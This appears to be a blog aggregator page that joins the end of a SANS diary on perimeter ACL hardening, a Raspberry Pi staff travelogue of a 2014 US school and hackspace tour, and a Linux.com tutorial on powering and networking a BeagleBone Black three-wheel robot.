What should you do to prevent scans like this and the exploits based on them?  The ACL on your perimeter interface might currently end with a “deny tcp any any log” – consider adding “deny udp any any log”, or better yet, replace it with “deny ip any any log”.  Permit *exactly* what you need, deny everything else, and just as important – LOG everything that gets denied.  Logging most of what is permitted is also a good idea – if you’ve ever had to troubleshoot a problem or backtrack a security incident without logs, you are likely already doing this.

Adding a few honeypots into the mix is also a nice touch.  Denying ICMP will often defeat scripts or cursory scans.  Many network devices can be configured to detect scans and “shun” the scanning host – test this first though, you don’t want to block production traffic by accident with an active control like this.

Have you found something neat in what most might otherwise consider a common and relatively “secure” protocol?  Please, use our diary to share your story !

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Raspberry Pi: Ben’s Mega USA Tour

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Last month we put out a blog post advertising that I would be doing a tour of America, with a rough initial route, and we welcomed requests for visits.


Over the next couple of weeks I was overwhelmed with visit requests – I plotted all the locations on a map and created a route aiming to reach as many as possible. This meant covering some distance in the South East before heading back up to follow the route west towards Utah. I prepared a set of slides based on my EuroPython talk, and evolved the deck each day according to the reception, as well as making alterations for the type of audience.

With launching the Education Fund, being in Berlin for a week for EuroPython followed by YRS week and a weekend in Plymouth, I’d barely had time to plan the logistics of the trip – much to the annoyance of our office manager Emma, who had to book me a one-way hire car with very specific pick-up and drop-off locations (trickier than you’d think), and an internal flight back from Salt Lake City. I packed a suitcase of t-shirts for me to wear (wardrobe by Pimoroni) and another suitcase full of 40 brand new Raspberry Pis (B+, naturally) to give away. As I departed for the airport, Emma and Dave stuck a huge Raspberry Pi sticker on my suitcase.


When checking in my suitcase the woman on the desk asked what the Raspberry was, and her colleague explained it to her! In the airport I signed in to the free wifi with one of my aliases, Edward Snowden. I started to think Phil McKracken or Mr. Spock might have been a better choice once I spotted a few security guards seemingly crowding around in my proximity…

Mon 4 – NYC, New York

I managed to board the flight without a federal investigation (although I may now be on the list, if I wasn’t already), and got chatting to the 60 year old Texan lady I was seated with, who hadn’t heard about Raspberry Pi until she managed to land a seat next to me for 8 hours. I had her convinced before we left the ground. I don’t know how he does it, but Richard Branson makes 8 hours on a tin can in the sky feel like heaven. Virgin Atlantic is great!

Upon landing at JFK I was subjected to two hours’ queuing (it was nice of them to welcome us with traditional British pastimes), followed by a half-hour wait to get through customs. I felt I ought to declare that I was bringing forty computers in to the country (also stating they were to be given away), and was asked to explain what they were and show one to the officer, who took hold of one of the copies of Carrie Anne‘s book, Adventures in Raspberry Pi, to validate my explanation. Fortunately I was not required to participate in a pop quiz on Python indentation, GPIO, Turtle graphics and Minecraft, as he took my word for it and let me through. I was then given the chance to queue yet again – this time about 45 minutes for a taxi to Manhattan. I arrived at Sam‘s house much later than I’d anticipated, but she was there to greet me by hanging her head out the window and shouting “MORNING BEN”. An in-joke from a time we both lived in Manchester.

We ate and met my friend-from-the-internet Aidan, then went to a bar until what was 5am on my body clock. A sensible approach, I thought, was to just stay up and then get up at a normal time the next day. I awoke and saw the time was 6.00 – my jetlagged and exhausted mind decided it was more likely to be 6pm than 6am, but it was wrong. I arose and confirmed a meeting time and place for my first visit – just a few blocks away from Sam’s apartment in Manhattan.

Tue 5 – NYC, New York

I met Cameron and Jason who had set up a summer class teaching a computing course for locals aged 18-and-under for 2 weeks, delivered purely on Raspberry Pis! I chatted with them before the students arrived, and they told me about how they set up the non-profit organisation STEMLadder, and that they were letting the students take the Pis home at the end of the course. Today’s class was on using Python with Minecraft – using some material they found online, including a resource I helped put together with Carrie Anne for our resources section.

I gave an introduction about the Raspberry Pi Foundation and showed some example projects and then the kids did the Python exercises while working on their own “side projects” (building cool stuff while the course leaders weren’t looking)!


Thanks to Cameron and Jason for taking the opportunity to provide a free course for young people. A perfect example use for Raspberry Pi!

Wed 6 – Washington, DC

On Wednesday morning I collected my hire car (a mighty Nissan Altima) and set off for Washington, DC! I’d only been driving for less than a year, so getting in a big American car and the prospect of using the streets of Manhattan to warm up seemed rather daunting to me! I had a GPS device which alleviated some of my concern – and I headed South (yes, on the wrong right side of the road).


I’d arranged to meet Jackie at 18F – a digital services agency project in the US government General Services Administration. This came about when I met Matt from Twilio at EuroPython, who’d done a similar tour (over 5 months). After a 6 hour drive including horrendous traffic around Washington (during which I spotted a sign saying “NSA – next right – employees only“, making me chuckle), I arrived and entered 18F’s HQ (at 1800 F Street) where I had to go through security as it was an official government building. I was warned by Jackie by email that the people I’d be meeting would be wearing suits but that I need not worry and could wear what I pleased – so I proudly wore shorts and a green Raspberry Pi t-shirt. I met with some of the team and discussed some of their work. 18F was set up to replicate some of the recent initiatives of the UK government, such as open data, open source projects and use of GitHub for transparency. They also work on projects dealing with emergency situations, such as use of smartphones to direct people to sources of aid during a disaster, and using Raspberry Pis to provide an emergency communication system.

We then left 18F for the DC Python / Django District user group, where I gave a talk on interesting Python projects on Raspberry Pi. The talk was well received and I took some great questions from the audience. I stayed the night in Washington and decided to use the morning to walk round the monuments before leaving for North Carolina. I walked by the White House, the Washington Monument and the Lincoln Memorial and took some awkward selfies:

IMG_20140807_085420
IMG_20140807_090645
IMG_20140807_092515

Thu 7 – Raleigh, North Carolina

I left DC and it took me 6 hours to get to North Carolina. I arrived at the University (NCSU) in Raleigh just in time for the event – Code in the Classroom – hosted at the Hunt library and organised by Elliot from Trinket. I set my laptop up while Elliot introduced the event and began my talk. There was a good crowd of about 60 people – from around age 7 to 70!


The talk went down well, and I received many questions about teaching styles, classroom management and the future of the hardware. One older chap, who has been running a summer coding club on the Pi shouted out: “Where were you two weeks ago when I needed you!?” when I answered one of his questions, which generated laughter from the audience. I also had a teacher approach me after the talk asking if she could take a selfie with me to show her students she’d met someone from Raspberry Pi – I happily obliged and showed her some of my awkward selfies from Washington, DC. She asked if we could take an awkward one too – needless to say, I happily obliged!


Elliot had arranged a room next door to the lecture theatre with some Pis set up for kids to play on. I gave out some Pis to the kids and it was well over an hour before the last of them were dragged home by their parents. I chatted with Elliot and the others about them setting up a regular event in Raleigh – as there was obviously huge demand for Pi amongst kids and adults in the area and beyond (I’d heard someone had driven up from Florida to attend the talk!) – and so I look forward to hearing about the Raleigh Raspberry Jam soon! A few of us went out to get pizza, and we were accompanied by one of the smartest kids I’ve ever met – and among interesting and inspiring conversation, he kept asking me seemingly innocent questions like “what do you call that thing at the back of your car?” to which I’d reply with the British word he wanted me to speak! (It’s a boot.)


Here’s a video of the talk:

I thanked Elliot and departed for Greensboro, where I’d arranged to stay with my friend Rob from my university canoe club, and his wife Kendra.

Fri 8 – Charlotte, North Carolina

In the morning I left for UNC Charlotte where I spoke to embedded systems engineering students at EPIC (Energy Production Infrastructure Centre). There was a good crowd of about 60 students and a few members of staff. When I entered the room they were playing Matt Timmons-Brown’s YouTube videos – what a warm-up act!


Following the talk I chatted with students about their projects, answered some questions, deferred some technical questions to Gordon and Alex, and was taken out to a brilliant craft beer bar for a beer and burger with some of the staff.


In the evening Rob, Kendra and I went out to eat – we had a beer in a book shop and ate bacon (out of a jam jar) dipped in chocolate. True story. We also took some group awkward selfies:


Sat 9 – Pigeon River, Tennessee

The Saturday I’d assigned to be a day off – I hoped to go kayaking with Rob but he had to work and Kendra was busy so Rob put me in touch with some paddling friends who welcomed me to join them on a trip to the Pigeon River in Tennessee! An early start of 6am left me snoozing in the back of the car, which Matt took the chance to snap a picture of and post it to Facebook (I only found out when Rob mentioned it later that evening). We had a nice couple of runs of the river by kayak, accompanied by a rafting party. And another awkward selfie.


Sun 10 – Lawrenceville, Georgia

On Sunday morning I left Rob and Kendra’s for Georgia. One of the requests I’d had was from a man called Jerry who just wanted to meet me if I was passing by. I said it’d be great if he could set up a public meeting to be more inclusive – and he got back in touch with a meetup link for an event at Geekspace Gwinnett – a community centre and hackspace in Lawrenceville. I pulled up, shook hands with Jerry and was shown to the front of the room to connect up my laptop. There was a larger crowd than I’d imagined, seeing as Jerry had set the event up just a few days prior to this – but there were about 40 people there, who were all very interested in Raspberry Pi and after my talk we had a great discussion of everyone’s personal projects.


Liz, who runs marketing for the space, gave me a tour, and Joe, the guy setting up the AV for my presentation spotted the Adventure Time stickers on my laptop and told me he worked for Turner in Atlanta who broadcast Cartoon Network, and offered to give me a tour of the network when he went on his night shift that evening. I went to Jerry’s house where he and his wife cooked for me and he showed me Pi Plates, the extension board he’s been working on.


I then left to meet Liz and her husband, Steve, who has been working on a huge robotics project – a whole wearable suit (like armour) that’s powered by a Pi and will make sounds and be scary! I look forward to the finished product. They also have an arcade machine Steve built years ago (pre-Pi) which houses a PC and which, he claims, had basically every arcade game ever on it.


Did you know there was a Michael Jackson game for the Sega Mega Drive, where you have to perform dance moves to save the children? Neither did I

We set off for Atlanta at about 11.30pm and I witnessed its beautiful skyline, which is well lit up at night. We arrived at Turner and met Joe, who gave us the tour – I’ve never seen so many screens in my life. They show all the broadcast material for TV and web on screens and have people sit and watch them to ensure the integrity of the material and ensure the advertising rules are adhered to. We also saw the Cartoon Network floor of the office side of the building where staff there work on the merchandise for shows like Adventure Time!


Joe also showed us the Turner Makers room – a mini hackspace for the Turner staff to work on side projects – he told me of one which used a Raspberry Pi to control steps that would light up and play a musical note as you walked across them. They’re currently working on a large games arcade BMO with a normal PC size screen as a display – I look forward to seeing it in action when it’s finished.


It’s great to see the space has since set up their own monthly Raspberry Pi group!

Mon 11 – Chattanooga, Tennessee

I then left Georgia to return to Tennessee, where I’d arranged to visit Red Bank Middle School in Chattanooga. I arrived at the school, signed in to get my visitor’s badge and met Kimberly Elbakidze - better known to her students as Dr. E – who greeted me with a large Subway sandwich. I ate in the canteen and while chatting with some of the staff I noticed the uniformed security guard patrolling the room had a gun on his belt. Apparently this is normal in American schools.

It was the first day back at the school, so the children were being oriented in their new classes. I gave two short talks, introducing the Raspberry Pi and what you can do with it – to sixth and eighth graders, and opened for some questions:

“Do you like Dr. Who?”
“Is that your real accent?”
“Are you really from England?”
“Can I get a picture with you?”
“Can I keep Babbage?”


I wrapped up, left them a copy of Carrie Anne’s book and some Pis, and went on my way. I’d intended to get online and confirm the details of my next school visit (I’d arranged the date with the teacher, but we hadn’t settled on the time or what we were doing), but access to the internet from the school was restricted to staff so I couldn’t get on. I had to set off for Alabama, and only had the school name and the town. I put the town name in to my car’s GPS and set off.

Tue 12 – Talladega, Alabama

I arrived in Talladega town centre unsure how close I was to the school. I parked up and wandered down the main street in magnificent sunshine and intense heat looking for a McDonald’s or Starbucks, hoping to get on some WiFi to check where it was. With no luck, I headed back to the car and decided to just find a hotel and hope that I was at least nearby. I asked someone sitting outside a shop if she knew of the school – RL Young Elementary School – and she said it was just 15 minutes or so away, so I asked for a nearby hotel and she pointed me in the right direction. As I neared the car, the intense heat turned into a terrific storm – the 5 minute drive to the hotel was in the worst rain I’ve ever seen.


I checked in to the hotel and got on with my emails – I sent one to the teacher who’d requested me at the school to say I’d arrived in Talladega, that I was staying in the Holiday Inn, and asked what time I should come in. My hotel phone rang 5 minutes later – it was the husband of the teacher. Trey said the principal hadn’t been told about the visit yet, and the details needed to be confirmed with her before we set a time – but they would sort it out as soon as possible and let me know. He offered to take me out for a meal that night so I arranged to meet him within an hour. Just as I was leaving I got an email from someone called Andrew who said he’d just spotted I was in Talladega, and asked if I could meet him if I had time – I said if he could get to the restaurant, I’d be there for the next couple of hours.

As I arrived I met them both, and introduced them to each other. Driving through that afternoon I’d noticed the town has about 50 churches. Trey said he recognised Andrew’s surname, and Andrew said his father was the priest of one of the churches, and Trey said he knew him. Andrew was also training to become a priest like his Dad, and Trey said he’d skipped Bible school that night to come and meet me. We had a nice meal and a chat and Trey said he’d let me know in the morning what the plans for the school visit were. Andrew offered to take me out for breakfast and show me around the town. I said I’d contact him in the morning once I’d heard the timings from Trey.

Once I woke up the next morning my email told me I needed to be at the school for about 1pm, so I had time to go to breakfast with Andrew, and he showed me around the place. I also visited his home and his church and met his family. He showed me some Raspberry Pi projects he’s been working on too.


He also offered to help out at the school – RL Young Elementary, so we got my kit and he drove us over. We signed in at reception where we entered our names in to a computer which printed visitor labels (seriously – a whole PC for that – and another just showing pictures of dogs! The Raspberry Pi was definitely needed in this place).


I was to follow a woman from the Red Cross, who gave a talk to the children about the importance of changing their socks every day. I thought an introduction to programming with Minecraft might blow their smelly socks right off!

The principal attempted to introduce me but had no idea who I was or why I was there, so just let me get on with it. I spoke to the young children and introduced the Raspberry Pi, focusing on a Minecraft demo at the end where I let them have a go themselves. The principal thanked me, said it was interesting and wished me a safe trip back to Australia! I left them some Pis and a copy of Adventures in Raspberry Pi.

Wed 13 – Somerville, Tennessee

I’d arranged my next visit with a very enthusiastic teacher called Terri Reeves from the Fayette Academy (a high school) in Somerville, Tennessee. In her original request she’d said she wasn’t really on my route, but would be willing to travel to meet me for some training – but I explained I’d changed my route to try to hit as many requests as I could, so I’d be happy to visit the school. She offered to let me stay at her house, and told me her husband would cook up some Southern Barbecue for me on arrival. It was quite a long drive and I arrived just after sunset – the whole family was sitting around the table ready to eat and I was welcomed to join them. I enjoyed the Southern Barbecue and was treated to some Razzleberry Pie for dessert. I played a few rounds of severely energetic ping pong with each of Terri’s incredibly athletic sons and daughters before getting to bed.

I spent most of the day at the school, where I gave my Raspberry Pi talk and demo to each of Terri’s classes. Again, it was the first week back for the school so it was just orientation for students settling in to their classes and new routines. The information went down well across the board and Terri said lots of students wanted to do Raspberry Pi in the after-school classes too.

This is what the Raspberry Pi website looks like in the school, as Vimeo is blocked

I joined some students for lunch, who quizzed me on my English vocabulary and understanding of American ways – they thought it was hilarious when I pointed out they said “Y’all” too much. I suggested they replace it with “dawg”. I do hope this lives on.


 


I also took a look at a project Terri had been trying to make in her free period – she’d been following some (really bad) instructions for setting up a webcam stream from a Pi. I diagnosed the problem fairly quickly – the apt-get install motion command she’d typed had failed as the site containing the .deb (hexxeh.net) was blocked on the school network (for no good reason!) – I asked if we could get it unblocked and the network administrator came over and unblocked it. She originally only wanted to unblock it for the Pi’s IP address, but I explained that would mean no-one else could install things or update their Pis without access to that website, so she unblocked it for the whole network. I tried again and there were no further problems so we proceeded to the next steps.

I then drove about an hour West to Downtown Memphis where I spent the early evening between Elvis Presley Boulevard and Beale Street (no sign of a Clive museum, just a row of Harley Davidsons) where I bought a new hat, which soon became the talk of the office.

 

My new hat


When I returned to Terri’s house she asked me to help her with webcam project again – I checked she’d done all the steps and tried opening the stream from VLC Player on my laptop. I’ve never heard anyone shriek with joy so loud when she saw the webcam picture of us on that screen! Terri was overjoyed I’d managed to help her get that far.

Thu 14 – Louisville, Kentucky

I left the next morning for Louisville (pronounced Lou-er-vul), and en route I realised I’d started to lose my voice. I arrived in the afternoon for an event at FirstBuild, a community hackspace run by General Electric. The event opened with an introduction and a few words from me, and then people just came to ask me questions and show me their projects while others were shown around the space and introduced to the equipment.



Check out this great write-up of the FirstBuild event: Louisville, a stop on US tour for credit-card sized computers.

We then proceeded to the LVL1 hackerspace where I was given a tour before people arrived for my talk. By this point my voice had got quite bad, and unfortunately there was no microphone available and the room was a large echoey space. However I asked people to save questions to the end and did my best to project my voice. I answered a number of great questions and got to see some interesting projects afterwards.

Fri 15 – St. Louis, Missouri

Next – St. Louis (pronounced Saint Lewis), Missouri – the home of Chuck Berry. I had a full day planned by teacher and tinkerer Drew McAllister from St. John Vianney High School. He’d arranged for me to meet people at the Grand Center Arts Academy at noon, then go to his school to speak to a class and the after school tech club followed by a talk at a hackspace in the evening.

I was stuck in traffic, and didn’t make it to the GCAA meetup in time to meet with them, so we headed straight to the school where I gave a talk to some very smartly dressed high school students, which was broadcast to the web via Google Hangouts. Several people told me afterwards how bad my voice sounded on the Hangout. Here it is:

I had a few minutes’ rest before moving next door to the server room, where they host the after school tech club – Drew kindly filled in the introduction of the Pi to begin (to save my voice) and asked students if they knew what each of the parts of the Pi were for. I continued from there and showed examples of cool projects I thought they’d like. I gave Drew some Pis for the club and donated some Adafruit vouchers gifted by James Mitchell – as I thought they’d use them well.

Drew showed me around St. Louis and took me out for a meal (I consumed lots of hot tea for my throat) before we went to the Arch Reactor hackerspace. I gave my talk and answered a lot of questions before being given a tour of the space.

Throat sweet selfie

Sat 16 – Columbia, Missouri

In the morning I left in the direction of Denver, a journey long enough that it had to be broken up over two days. I had no visit requests in Kansas City, but there was one in Columbia, which was on my way and not far off it, so I stopped there to meet a group called MOREnet, who provide internet connectivity and technical support to schools and universities. Rather than have me give a talk, they organised a sit-down chat and asked me questions about education, teacher training and interesting ways of learning with Raspberry Pi. Some of the chat was recorded on video, which you can watch at more.net (please excuse my voice).

I even got to try Google Cardboard – a simple virtual reality headset made with cardboard and an Android phone. A very nice piece of kit! I stayed a couple of hours and made my way West. I’d asked around for a good place to stay that night on my way to Denver. Some people had suggested Hays in Kansas so I set that as my destination. It had taken me 2 hours to get to Columbia and would be another 6+ hours to Hays, so it was always going to be a long day, but at least I was in no rush to arrive anywhere for a talk or event.

Kansas City Selfie

I stopped briefly in Kansas City (actually in the state of Missouri, not Kansas) to find almost nobody out and almost everything closed. I think it’s more of a nightlife town. I finally arrived in Hays at 8.30pm after the boring drive through Kansas and checked in to a hotel just in time for a quick dip in the swimming pool.

Sun 17 – Denver, Colorado

I left Hays for Denver, which meant I had a good 5+ hour drive ahead – all along that same freeway, the I-70 – to arrive at denhac, the Denver Hackspace, for 4pm. I’d also arranged late the night before to visit another Denver hackspace afterwards, so I said I’d be there at 7pm. On my way into Denver I noticed a great change in weather – lots of dark grey and black clouds ahead – and as I got closer I hit some rough winds and even witnessed a dust storm, where dust from the soil and crops of the fields was swept into the air. It was surreal to drive through!

I worked out later that the distance I’d travelled that day was roughly equivalent to driving from Southampton to Inverness! The longest I’ve driven before is Southport to Cambridge!

I arrived just on time and was greeted by Sean, who had invited me. He introduced me to the members, all sitting around their laptop screens, and gave me a tour of the space. He told me how the rent for the space had been rising recently due to new demand for warehouse space such as theirs for growing cannabis, now that it is legal in Colorado. I took some pictures of cool stuff around the space, including a Pibow-encased Pi powering a 3D printer. I even got to try on Sean’s Google Glass (I think Cardboard is much better).

To Grace Hopper, you will always be grasshopper

One of the neatest Pi cases I’ve ever seen

I met a young girl, about 12 years old, who told me she recently went into an electronics shop saying she wanted to buy a Raspberry Pi for a new project, and the member of staff she spoke to had never heard of a Raspberry Pi and assumed she wanted to cook one. Anyway, I gave her one of mine – she was delighted and immediately announced it in the networked Minecraft game she was hosting. I gave my talk in their classroom (great to see a classroom in a hackspace) before heading to my next stop – TinkerMill.

TinkerMill is a large hackspace, coworking space and startup accelerator in Denver. On arrival a group of people were sitting ready for my talk, so I got set up and was introduced by Dan, who runs the space and works out of it. The hackspace version of my talk includes more technical detail and updates on our engineering efforts. This went down well with the group, and after answering a few questions we broke out into conversation about the Pi’s possibilities and the great things that have come out of the educational mission.

I found a Mini Me

I also met a woman called Megg who was standing at the back of the room; I got chatting to her and she asked me a few questions. She hadn’t attended the event but had just come to use the laser cutter for the evening, and caught the end of the talk. She kept asking me questions about the Pi, and in answering them I basically gave the talk again. She said the reason she hadn’t come to the talk was that she was planning to use an Arduino in some future projects: she’d heard you could do more with a Pi, so she assumed it must be more complex to use. I explained the difference, hoping to show how the Pi might be useful to her after all – on a Pi she could choose whatever tool or language suited her, which is not an option with Arduino. She also discussed ideas for creative projects and wearables which were really interesting, so I told her all about Rachel’s project Zoe Star and put her in touch with Rachel, Charlotte and Amy. Dan took Megg and me out to dinner and we had a great time.

Mon 18 – Boulder, Colorado

Dan offered to put me up and show me around Denver the following day – I’d originally planned to get straight off to Utah the next day but it made sense to have an extra day in Denver – I’m glad I did as I really enjoyed the town and got to have a great chilled out day before driving again. We drove up one of the nearby mountains to a height of almost 10,000 feet.

Mountain selfie

I wandered around Boulder, a wonderful town full of cafes, restaurants and interesting shops. I ended up buying most of my awful souvenirs there – including a three-tiered monkey statue for Liz:

And you are a monkey too

We ate at a restaurant called Fork so it seemed appropriate to get a picture for my Git/GitHub advocacy!

FORK!

Colorado seemed to be the most recognisable state in all the places I visited, by which I mean it was culturally closest to Britain. My accent didn’t seem too far from theirs, either. A really nice place with great food and culture, with mountains and rivers right on hand. I could live in a place like that!

Tue 19 – Provo, Utah

I left Dan’s in the morning and headed West along the I-70 again. After a couple of bathroom breaks I got on some McDonald’s WiFi and checked my email and twitter – I’d had a tweet asking if I would be up for speaking in Provo that night. I thought “why not?” and said yes – expecting to arrive by 7pm, I suggested they make it 8pm just in case. I was actually heading to Provo already, in hope of meeting up with some family friends, Ken and Gary, who I stayed with last time I visited Utah. I hadn’t managed to get hold of them yet, but I kept ringing every now and then to see if they were around. When I finally got hold of them, they asked if they could come to see my presentation – so I told them where it was and said I’d see them there.

As I entered Utah the scenery got more and more beautiful – I pulled up a few times to get pictures. The moment I passed the ‘Welcome to Utah’ sign I realised what a huge feat I’d accomplished, and as I started to see signs to Salt Lake City – my end point – I was overjoyed. I hadn’t covered much distance across the country in my first week, as I’d gone South, along a bit, North and East a bit before finally setting off from St. Louis in the direction of the West Coast, so finally starting to see the blue dot on my map look a lot closer to California meant a lot.

I arrived in Provo about 7.30, located the venue, the Provo Web Academy, and by the time I found the right place and parked up it was 8pm. I was greeted by the event organiser, Derek, and my friends Ken and Gary! I hadn’t seen them for 13 years so it was a pleasure to meet again. I set up my presentation and gave my talk, had some great questions and inspired the group of about 20 (not bad, to say it had been organised just a few hours earlier) to make cool things with Pi and teach others to do the same. I went out to eat with Ken and Gary and caught up with them.

Wed 20 – Logan, Utah

The next day I had my talk planned for 4pm in Logan (North of Salt Lake City) so I had all morning free to spend with Ken (retired) while Gary was at work. Back story: my Mum (a primary school teacher) spent a year at a school in Utah in 1983-84 on an exchange programme. Ken was a fellow teacher at the school, and like many others, including families of the kids she taught, she kept in touch with him. As I said, we visited in 2001 while on a family holiday, and stayed with them on their farm. So Ken and I went to the school – obviously many of the staff there knew Ken as he only recently retired, and he told them all about my Mum and that I was touring America and wanted to visit the school. None of the teachers there were around in 1984, but some of the older ones remembered hearing about the English teachers who came that year. I took photos of the school and my Mum’s old classroom and sent them to her. We visited another teacher from that time who knew all about me from my Mum’s Christmas letter (yikes!) and even went to see the trailer my Mum lived in for the year!

I then left Provo for Logan, where the talk was to take place at Utah State University. I’d prepared a talk aimed at university students, really, but discovered a large proportion of the audience were children from a maker group aimed at getting kids into tech hardware projects; they seemed to follow along and get some inspiration from the project ideas anyway. Down to my last two Pis, I did what I did at most events and called out for the youngest people in the room – these went to a 5 and a 7 year old – and my demo Babbage (I mention Dave Akerman’s Space Babbage in all my talks) was given to a family too.

My final talk was recorded, but they told me they were recording the other screen so I’m out of the frame in most of the video.

Happy to have completed the tour, sad for my journey to be coming to an end, but glad to be able to sit down and take a breather, I chilled out for a while before heading back to Provo for my final night in America. I thought at one point I wouldn’t make it back as I hit a storm on my way and could barely see the road in front of me through the incredible rain. With the entire 4-lane freeway slowing to 40mph and high beams glaring, I caught a glimpse of the white lines now and then, corrected the wheel accordingly, and made it back safely to join Ken and Gary for dinner.

Ken, me, Gary

Thu 21 – Salt Lake City, Utah

I bid farewell and left for the airport, returned my hire car with 4272 miles on it – which was 10% of the car’s overall mileage!

I flew from Salt Lake City to New York and stupidly forgot to tell them that wasn’t my final destination, so I had to retrieve my suitcases at JFK baggage claim and check them back in for my next flight – because, you know, I like stress. Despite the internal flight running late and me not having a boarding card for my second flight (I had no access to a printer or WiFi in the 24 hours before it), I had no problems and my luggage was successfully transported back to London with me. I was driven back to Cambridge, then up to Sheffield, where I bought a suit, had my hair cut and attended the wedding of two great friends – Congratulations, Lauren and Dave.

Lauren and Dave

What did I learn?

  • Despite sales of Pis in America being the biggest in the world, the community is far less developed than it is in the UK and in other parts of Europe. There are hardly any Jams or user groups, but there is plenty of interest!
  • American teachers want (and need) Picademy – or some equivalent training for using Pis in the classroom.
  • There is a perception that Raspberry Pi is not big in America (due to the lack of community), and an assumption that Pis are hard to buy in America. While the latter is still true of many hardware stores (though people should bug stores not selling Pi and accessories to start stocking them!), I refer people to Amazon, Adafruit and our main distributors Element14 and RS Components. You can also buy them off the shelf at RadioShack.
  • If you build it, they will come. Announcing that I would turn up to a hackspace on a particular day brought people from all walks of life together to talk about Raspberry Pi, in much the same way a Raspberry Jam does in the UK. I could stand in front of these people and make them realise there is a community – they’re sitting in the middle of it. All they need is a reason to meet up – a Jam, a talks night, an event, a hack day, a tech club. It’s so easy to get something started, and you don’t need to start big – just get a venue and some space, tell people to turn up with Pis and take it from there.

Huge thanks to all the event organisers, the people who put me up for the night or took me out for a meal, and everyone involved in this trip. Sorry if I didn’t make it to you this time around – but I now have a map and a list of the places where we’re wanted, so we hope to cover more ground in future.

You can view the last iteration of my talk slides at slideshare.

Linux How-Tos and Linux Tutorials: How to Control a 3 Wheel Robot from a Tablet With BeagleBone Black

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

Give the BeagleBone Black its own wheels, untether it from all cables, and control the robot from a tablet.

The 3 Wheel Robot kit includes all the structural material required to create a robot base. To the robot base you have to add two gearmotors, batteries, and some way to control it. Leaving the motors out of the 3 wheel kit allows you to choose the motor with a torque and RPM suitable for your application.

In this article we’ll use the Web server on the BeagleBone Black and some Bonescript to allow simple robot control from any tablet. No ‘apps’ required. Bonescript is a nodejs environment which comes with the BeagleBone Black.

Shown in the image at left is the 3 wheel robot base with an added pan and tilt mechanism. All items above the long black line and all batteries, electronics, cabling, and the two gearmotors were additions to the base. Once you can control the base using the BeagleBone Black, adding other hardware is relatively easy.

This article uses two 45 rpm Precision Gear Motors. The wheels are 6 inches in diameter so the robot will be speed-limited to about 86 feet per minute (26 meter/min). These motors can run from 6-12 volts and draw a maximum stall current of 1 amp. The large stall current draw will happen when the motor is trying to turn but is unable to, for example if the robot has run into a wall and the tires do not slip. It is a good idea to detect cases that draw stall current and turn off power to avoid overheating and/or damaging the motor.

In this Linux.com series on the BeagleBone Black we have also seen how to use the Linux interface allowing us to access chips over SPI and receive interrupts when the voltage on a pin changes, and how to drive servo motors.

Constructing the 3 Wheel Robot

3 wheel robot kit parts

The parts for the 3 Wheel Robot kit are shown above (with the two gearmotors in addition to the raw kit). You can assemble the robot base in any order you choose. A fair number of the parts are used, together with whichever motors you selected, to mount the two powered front wheels. The two pieces of channel are connected using the hub spacer and the swivel hub is used to connect the shorter piece of channel at an angle at the rear of the robot. I’m assuming the two driving wheels are at the ‘front’. I started construction at the two drive wheels as that used up a hub adapter, screw hub, and two motor mount pieces. Taking those parts out of the mix left less clutter for the subsequent choice of pieces.

Powering Everything

In a past article I covered how the BeagleBone Black wants roughly 2.5 to a little over 3 Watts of power to operate. The power requirements for the BeagleBone Black can be met in many ways. I chose to use a single 3.7-Volt 18650 lithium battery and a 5 V step-up board. The BeagleBone Black has a power jack expecting 5 V. At a high CPU load the BeagleBone Black could take up to 3.5 W of power, so the battery and step-up converter have to be able to comfortably supply 5 V at 700 mA. The battery is rated at about 3 amp-hours so the BeagleBone Black should be able to run for hours on a single charge.
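
A quick back-of-the-envelope check of those figures helps when sizing the supply. This is only a sketch: the 90 percent step-up efficiency below is an assumption, not a measured value.

// Rough power budget for the BeagleBone Black supply.
var boardWatts      = 3.5;                            // worst-case draw at high CPU load
var supplyVolts     = 5.0;                            // step-up converter output
var currentAmps     = boardWatts / supplyVolts;       // 0.7 A, i.e. the 700 mA figure above
var packWattHours   = 3.7 * 3.0;                      // 18650 cell: ~3.7 V nominal, ~3 Ah
var usableWattHours = packWattHours * 0.9;            // assume ~90% converter efficiency
var runtimeHours    = usableWattHours / boardWatts;   // just under 3 hours at full load
console.log(currentAmps + ' A, about ' + runtimeHours.toFixed(1) + ' hours at full load');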

The gearmotors for the wheels can operate on 6 to 12 V. I used a second battery source for the motors so that they wouldn’t interfere with the power of the BeagleBone Black. For the motors I used a block of 8 NiMH rechargeable AA batteries. This only offered around 9.5 V, so the gearmotors would not achieve their maximum performance, but it was a cheap supply to get going. I manually avoided stalling either motor in testing so as not to draw too much power from the AA batteries. Ideally you should add some stall protection that cuts power to the gearmotors and protects the batteries – for example, monitoring the current and turning off the motors if they attempt to draw too much – or use a more capable (and expensive) motor battery source.
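
As a rough illustration of that last idea, here is a minimal Bonescript sketch of a stall cut-out. The pin names and threshold are hypothetical placeholders (a current-sense resistor would need to feed the analog input), and the exact shape of the analogRead() callback can vary between Bonescript versions.

var b = require('bonescript');

var SENSE_PIN  = 'P9_40';   // hypothetical analog input wired to a current-sense resistor
var ENABLE_PIN = 'P8_45';   // hypothetical H-bridge enable pin driven by PWM
var THRESHOLD  = 0.8;       // normalised ADC reading treated as a stall (assumption)

// Poll the sense input a few times a second and cut motor power on a stall.
setInterval(function () {
    b.analogRead(SENSE_PIN, function (reading) {
        if (reading.value > THRESHOLD) {
            console.log('Stall current detected - disabling motor');
            b.analogWrite(ENABLE_PIN, 0, 2000);   // 0% duty cycle = motor off
        }
    });
}, 250);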

The motor power supply was connected to the H-bridge board, making the ground terminal on the H-bridge a convenient location for a common ground connection to the BeagleBone Black.

Communicating without Wires

The BeagleBone Black does not have on-board wifi. One way to allow easy communication with the BeagleBone Black is to flash a TP-Link WR-703N with openWRT and use that to provide a wifi access point for access to the BeagleBone Black. The WR-703N is mounted to the robot base and is connected to the ethernet port of the BeagleBone Black. The tablets and laptops can then connect to the access point offered by the onboard WR-703N.

I found it convenient to set up the WR-703N as a DHCP server and to assign the BeagleBone Black the same IP address it would have obtained on my wired network. This way the tablet can communicate with the robot both in a wired prototyping setup and when the robot is untethered.
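
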